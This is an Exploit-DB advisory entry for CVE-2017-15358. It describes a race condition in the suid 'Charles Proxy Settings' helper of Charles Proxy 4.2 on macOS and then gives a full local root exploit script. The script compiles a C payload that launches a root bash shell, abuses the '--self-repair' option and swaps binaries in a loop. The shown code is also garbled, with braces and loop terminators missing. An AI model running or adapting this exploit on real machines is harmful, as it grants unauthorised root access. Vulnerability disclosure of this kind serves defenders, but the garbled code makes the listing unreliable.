EDB-ID: 45107 | Author: Mark Wadham | Published: 2018-07-30 | CVE: CVE-2017-15358 | Type: Local | Platform: macOS | Aliases: N/A | Advisory/Source: Link | Tags: Local | Vulnerable App: N/A | inspecting SSL traffic for any application on your machine.
In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.
Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:
/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.
It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.
This issue was fixed in Charles 4.2.1 released in November 2017.
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
return 0;
gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
echo "failed to compile the exploit, you need xcode cli tools for this."
exit 1
rm -f charles_exploit.c
ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings
while :
r=`ls -la Charles\ Proxy\ Settings |grep root`
if [ "$r" != "" ] ; then
sleep 0.1
if [ $i -eq 10 ] ; then
rm -f Charles\ Proxy\ Settings
echo "Not vulnerable"
exit 1
./Charles\ Proxy\ Settings